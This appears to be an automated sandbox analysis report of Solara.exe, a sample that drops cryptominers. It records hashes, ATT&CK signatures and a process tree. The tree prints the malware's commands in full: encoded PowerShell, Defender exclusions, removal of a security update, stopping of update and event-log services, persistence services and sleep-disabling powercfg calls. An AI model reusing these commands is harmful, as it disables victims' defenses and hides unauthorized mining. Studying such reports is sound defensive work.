Analysis
-
max time kernel
16s -
max time network
37s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25/09/2024, 20:19
Static task
static1
Behavioral task
behavioral1
Sample
Solara.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Solara.exe
Resource
win10v2004-20240802-en
General
-
Target
Solara.exe
-
Size
21.2MB
-
MD5
a6bf6970741f337bcb700166165c1f30
-
SHA1
f90ace8f03e2b76e243d539c8570d157f658d025
-
SHA256
139c41c5638d344cf6a0f8fb38c61b3f657544b01dd95daff62d0e4b8ff908a1
-
SHA512
c5ef34314bfbd5db99d8d02981e4ce5b46776bdae87e4768963fa902319a4d9712afe7bca302688a424eb9e7dffb9aa5da8444ea2877a48e3f9dd67622477521
-
SSDEEP
393216:fOQxoHOKgCanLd/l/NmA6MierK6sl0Ibft5/TqcJb45EGle:2hOKgj/4MTrKV9ft5bqR5EGle
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1736 powershell.exe 2124 powershell.exe 1856 powershell.exe 1912 powershell.exe 1460 powershell.exe 1664 powershell.exe 652 powershell.exe 2404 powershell.exe 2384 powershell.exe 1572 powershell.exe -
Creates new service(s) 2 TTPs
-
Executes dropped EXE 7 IoCs
pid Process 2212 eth.exe 2896 xmr.exe 2816 Solara Bootstrapper.exe 2712 kx new.exe 2236 SolaraBootstrapper.exe 1052 Kawpow new.exe 2596 xmr new.exe -
Loads dropped DLL 11 IoCs
pid Process 1620 Solara.exe 1620 Solara.exe 1620 Solara.exe 1620 Solara.exe 1620 Solara.exe 2816 Solara Bootstrapper.exe 2816 Solara Bootstrapper.exe 2712 kx new.exe 2712 kx new.exe 2712 kx new.exe 2712 kx new.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 raw.githubusercontent.com 7 raw.githubusercontent.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2280 powercfg.exe 1716 powercfg.exe 1604 powercfg.exe 2152 powercfg.exe 1580 powercfg.exe 1544 powercfg.exe 2612 powercfg.exe 1712 powercfg.exe -
Launches sc.exe 43 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1084 sc.exe 1748 sc.exe 1468 sc.exe 2352 sc.exe 824 sc.exe 340 sc.exe 2892 sc.exe 2136 sc.exe 1292 sc.exe 2324 sc.exe 3012 sc.exe 2144 sc.exe 1348 sc.exe 1348 sc.exe 2904 sc.exe 2372 sc.exe 1912 sc.exe 600 sc.exe 1516 sc.exe 2280 sc.exe 2572 sc.exe 2776 sc.exe 1204 sc.exe 1660 sc.exe 2744 sc.exe 2516 sc.exe 2952 sc.exe 2920 sc.exe 1828 sc.exe 1664 sc.exe 1968 sc.exe 2140 sc.exe 472 sc.exe 2076 sc.exe 2144 sc.exe 2400 sc.exe 2692 sc.exe 2644 sc.exe 1348 sc.exe 2136 sc.exe 2336 sc.exe 1356 sc.exe 2520 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Solara Bootstrapper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kx new.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SolaraBootstrapper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Solara.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2872 powershell.exe 2348 powershell.exe 2984 powershell.exe 2236 SolaraBootstrapper.exe 2236 SolaraBootstrapper.exe 2212 eth.exe 2896 xmr.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 2348 powershell.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeDebugPrivilege 2236 SolaraBootstrapper.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 1620 wrote to memory of 2348 1620 Solara.exe 30 PID 1620 wrote to memory of 2348 1620 Solara.exe 30 PID 1620 wrote to memory of 2348 1620 Solara.exe 30 PID 1620 wrote to memory of 2348 1620 Solara.exe 30 PID 1620 wrote to memory of 2212 1620 Solara.exe 32 PID 1620 wrote to memory of 2212 1620 Solara.exe 32 PID 1620 wrote to memory of 2212 1620 Solara.exe 32 PID 1620 wrote to memory of 2212 1620 Solara.exe 32 PID 1620 wrote to memory of 2896 1620 Solara.exe 33 PID 1620 wrote to memory of 2896 1620 Solara.exe 33 PID 1620 wrote to memory of 2896 1620 Solara.exe 33 PID 1620 wrote to memory of 2896 1620 Solara.exe 33 PID 1620 wrote to memory of 2816 1620 Solara.exe 34 PID 1620 wrote to memory of 2816 1620 Solara.exe 34 PID 1620 wrote to memory of 2816 1620 Solara.exe 34 PID 1620 wrote to memory of 2816 1620 Solara.exe 34 PID 2816 wrote to memory of 2872 2816 Solara Bootstrapper.exe 35 PID 2816 wrote to memory of 2872 2816 Solara Bootstrapper.exe 35 PID 2816 wrote to memory of 2872 2816 Solara Bootstrapper.exe 35 PID 2816 wrote to memory of 2872 2816 Solara Bootstrapper.exe 35 PID 2816 wrote to memory of 2712 2816 Solara Bootstrapper.exe 37 PID 2816 wrote to memory of 2712 2816 Solara Bootstrapper.exe 37 PID 2816 wrote to memory of 2712 2816 Solara Bootstrapper.exe 37 PID 2816 wrote to memory of 2712 2816 Solara Bootstrapper.exe 37 PID 2816 wrote to memory of 2236 2816 Solara Bootstrapper.exe 38 PID 2816 wrote to memory of 2236 2816 Solara Bootstrapper.exe 38 PID 2816 wrote to memory of 2236 2816 Solara Bootstrapper.exe 38 PID 2816 wrote to memory of 2236 2816 Solara Bootstrapper.exe 38 PID 2712 wrote to memory of 2984 2712 kx new.exe 40 PID 2712 wrote to memory of 2984 2712 kx new.exe 40 PID 2712 wrote to memory of 2984 2712 kx new.exe 40 PID 2712 wrote to memory of 2984 2712 kx new.exe 40 PID 2712 wrote to memory of 1052 2712 kx new.exe 42 PID 2712 wrote to memory of 1052 2712 kx new.exe 42 PID 2712 wrote to memory of 1052 2712 kx new.exe 42 PID 2712 wrote to memory of 1052 2712 kx new.exe 42 PID 2712 wrote to memory of 2596 2712 kx new.exe 43 PID 2712 wrote to memory of 2596 2712 kx new.exe 43 PID 2712 wrote to memory of 2596 2712 kx new.exe 43 PID 2712 wrote to memory of 2596 2712 kx new.exe 43
Processes
-
C:\Users\Admin\AppData\Local\Temp\Solara.exe"C:\Users\Admin\AppData\Local\Temp\Solara.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Users\Admin\AppData\Local\Temp\eth.exe"C:\Users\Admin\AppData\Local\Temp\eth.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2212 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:2384
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2004
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:1072
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:2144
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2400
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:2136
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:1748
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:1468
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:2440
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "ARIBLEUL"3⤵
- Launches sc.exe
PID:600
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto"3⤵
- Launches sc.exe
PID:2352
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:2136
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "ARIBLEUL"3⤵
- Launches sc.exe
PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\xmr.exe"C:\Users\Admin\AppData\Local\Temp\xmr.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2896 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:1572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1660
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:2224
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:1664
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2336
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:1968
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:1348
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:824
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:2972
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:2516
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "ARIBLEUL"3⤵
- Launches sc.exe
PID:1356
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara Bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\Solara Bootstrapper.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Users\Admin\AppData\Local\Temp\kx new.exe"C:\Users\Admin\AppData\Local\Temp\kx new.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Users\Admin\AppData\Local\Temp\Kawpow new.exe"C:\Users\Admin\AppData\Local\Temp\Kawpow new.exe"4⤵
- Executes dropped EXE
PID:1052 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
PID:1856
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵PID:2140
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵PID:2844
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
PID:2372
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:1516
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
PID:2572
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
PID:1912
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
PID:472
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Power Settings
PID:2280
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Power Settings
PID:1712
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Power Settings
PID:2612
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Power Settings
PID:1544
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵PID:2940
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "CKTJZLMO"5⤵
- Launches sc.exe
PID:2076
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"5⤵
- Launches sc.exe
PID:340
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:1828
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "CKTJZLMO"5⤵
- Launches sc.exe
PID:2776
-
-
-
C:\Users\Admin\AppData\Local\Temp\xmr new.exe"C:\Users\Admin\AppData\Local\Temp\xmr new.exe"4⤵
- Executes dropped EXE
PID:2596 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
PID:1460
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
-
C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exeC:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe1⤵PID:2004
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:1912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:1688
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1948
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1292
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1660
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2692
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2744
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1348
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:2060
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:1728
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:1736
-
-
C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe"C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe"3⤵PID:2932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:652
-
-
C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe"C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe"3⤵PID:2524
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:2124
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:1588
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:1872
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:3012
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:1084
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:2520
-
-
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:2808
-
-
C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exeC:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe1⤵PID:1224
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:1664
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:2492
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:824
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2904
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2952
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2140
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2920
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2644
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:1592
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:600
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:2184
-
-
C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeC:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe1⤵PID:2640
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:2404
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:2132
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2560
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2144
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2324
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2892
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1348
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2280
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:1580
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:2152
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:1604
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:1716
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:1828
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:568
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:2696
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Defense Evasion
Impair Defenses
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
MD507ae042f167d7bc86265bdbc76167438
SHA10188b187a88b7465f8f9d610e955c969fb8e477d
SHA256fa06e9f73c5d4344ead083670feeb69fde341899296af449a93fffca4377b611
SHA5127f2f445a5a1f79b818ad1105ae5fe8d3d37b8403fadb2d8af34437bd808b5b0ff537150018f8ee87bdbfbcc35e55964af42b0933dff12513faec507281bf1276
-
Filesize
3.2MB
MD5d034f3ba65922ffc11c75990c6706cc0
SHA12323471d9bd01abc629aae3b9a6e41c7cb366261
SHA2564b170c0f40acae328e93cc631345fec9eabccfd32d231716f53e829b33204149
SHA512fe48d9708d2418e0b73ab0984121aad966a24af6272883828032d883b3c6a7ad127c40072501540cf122ebce58c7b957c462e6106cb33ed4dc8dfdc023770e6b
-
Filesize
5.2MB
MD5fb6a3b436e9f9402937d95f755b62f91
SHA1aea3a8a311c2b8b6fc7d9d263b952f95a30b180e
SHA2564c9d878e35e7fd497c633a770d3359fb37447985450dc19f45db0925972c39e0
SHA5127a3e2e42fe965db1cebc539235fec88e277669c9a62be2450ea4efaf5dd93f1de11740197ff26e697e9e9acc499cba2c30b64cfa5e5b35b28b9e0b93087ee2f8
-
Filesize
10.4MB
MD5d9d13fa25e880665fb471a4be57c494c
SHA17a4c1b09a9d37ff55872544a39a2cc5f0eec9523
SHA256632e973ab369d51e21b499e440bdd9c4b2ffaac9e435485a648de8724e1b19f7
SHA512cf20f3c108865614a27d498ee74198ee151027423b518024155b1dff553b33877aed81e7d5394094625d1ee7da5de82fa4ed119420009a3f3fc51019add3522e
-
Filesize
5.2MB
MD57d6398ebfb82a24748617189bf4ad691
SHA16c96d0e343e1e84bf58670f1249c1694a2012f04
SHA256d7cd81563e5b98b9a329286557de71186d3f8f364a46691aca253ca00e4c3ef2
SHA5129aeb3da479b23880de94e0b283a562ce19a79c2b27cb819ddf8e149eca5673a42c659fff10ea2ea9036aedda6fef37b97ecbf37236dd22baf20eba1e6dda4b4a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f83c87ffefd9527389c7bb25d4cf1a84
SHA1553a1b2d238c44e468e369151954481f0efa1b72
SHA256fd2731b34290c28e05f79445eb93795fd44e2d517af3fb9e129a92d44c3b0012
SHA5126010b10d1eb165b6b7502bc40b83c03d6fa5c1c6df5288906ae10942601e1c75063f0b4c2ad7cde2a3ab3ab1aba42d08b8115f464faf5dd05ea7078ca1fe1d68
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD57fec3a0b5a7310d98fe0ece82a076017
SHA123cd9f3cbef3e09039ab19eb09ba71c0b1f62195
SHA25678ff61d3c809fa9f8ba08ed605b791c85802e939ccd4ffc56ade88fb69aff3e9
SHA5127af0eee7f4b0d3b6c9156671faaaf8c53e749adb0135085b54f9b5569a35c3e66e52341cd21304c9e8537838c53811123ca5f04f6c9a5c370e8bf732aae64022
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PMPP5D70MWSACJEPVOYJ.temp
Filesize7KB
MD5815f4f02ae45e580fc4880e0610d094e
SHA1258dce0af929c530cfe3208cc3cfa8eea4b34856
SHA256efb2cfe389ce0b6f1f8dbe61e01cc0e04eb5786267ea6d685e65e32bb8066cda
SHA51251bba88932e82ee1b558d52f6ae831c67e4ae71e23c3754fc41a696fec52b141cfb7ced38a18ce0d9a1bba7bee66c0b15e2aeba0cfbddfa388e71fb9dc25e83a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5997bd4e65eb35723ee2e9b9ca2bf63d2
SHA1c8d63a261283b33f07950c7d3f01860a379c718f
SHA256acb355d3942b2c7aab72dfbd9cb93d728dae516ff36bc50bf4e855c4ef1f7fdf
SHA5122838cd71bd065ceb22abfae9355a6626a0756878b3a34e705fc661394dbe699c26b73f3a664ca3f77db18bd181d43e8dd8c66536838b35ffaf2536ee1864a590
-
Filesize
3.1MB
MD538dee6422cef26bd1e1e751404e4402c
SHA152a8a3b3cad69a21bb3d5eed2b7bdaeda3dd8f58
SHA25637d35b4dd7dd2a338ebabcf92c87bf336b0220a3b3832e3068a1d16587f75e3e
SHA5123b2624141aeb87e33a645ad505697353656c8e040587a355f800de6d765dd7f8f0a8c2a352de335fc75d3dc7a33d0576581d5585138d9968242c97c47e50c4df
-
Filesize
3.0MB
MD5cc003a4175fc13a97b3967b22a5f9a8e
SHA1de13562d22241c4bb335fdf5a7de4ece1e20ef03
SHA256d39dc2bb0c05b1060fa1c03c0ad111be20907c64c1a7523668ff7e2c0b0e2d41
